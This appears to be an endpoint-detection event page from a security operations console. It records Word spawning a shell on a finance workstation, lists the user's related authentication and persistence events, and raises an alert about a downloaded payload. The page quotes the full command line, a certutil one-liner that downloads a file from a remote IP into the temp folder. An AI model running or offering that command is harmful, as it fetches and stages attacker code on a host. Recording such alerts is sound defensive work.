All events
// Operations

Process Execution

winword.exe spawned cmd.exe which invoked certutil to retrieve a remote file

EVT-7F923BHigh

Command line

cmd.exe /c certutil -urlcache -split -f http://45.61.136.14/u.dat %TEMP%\u.dat

Same principal

Other activity for ekowalski around this time

TimeEventSeverityHost
2026-09-04 17:24:11ZAuthentication FailureLowWS-FIN-007
2026-09-04 17:46:09ZNetwork AllowMedium
2026-09-04 17:47:04ZPersistence CreatedHighWS-FIN-004
2026-09-04 17:52:54ZAuthentication FailureLowWS-FIN-004
2026-09-04 18:02:03ZAuthentication SuccessInfoWS-FIN-012
2026-09-04 18:26:22ZAuthentication SuccessInfoWS-FIN-004

Record

Source
CrowdStrike FalconEndpoint
Event type
PROCESS_EXECUTION
Observed

Pivot

Every identifier on this record, as a one-click hunt.

Alerts raised

  • Word spawned a shell that downloaded a remote payloadHigh

    winword.exe created cmd.exe on WS-FIN-004, which used certutil to retrieve u.dat from 45.61.136.14 and registered it as a recurring scheduled task.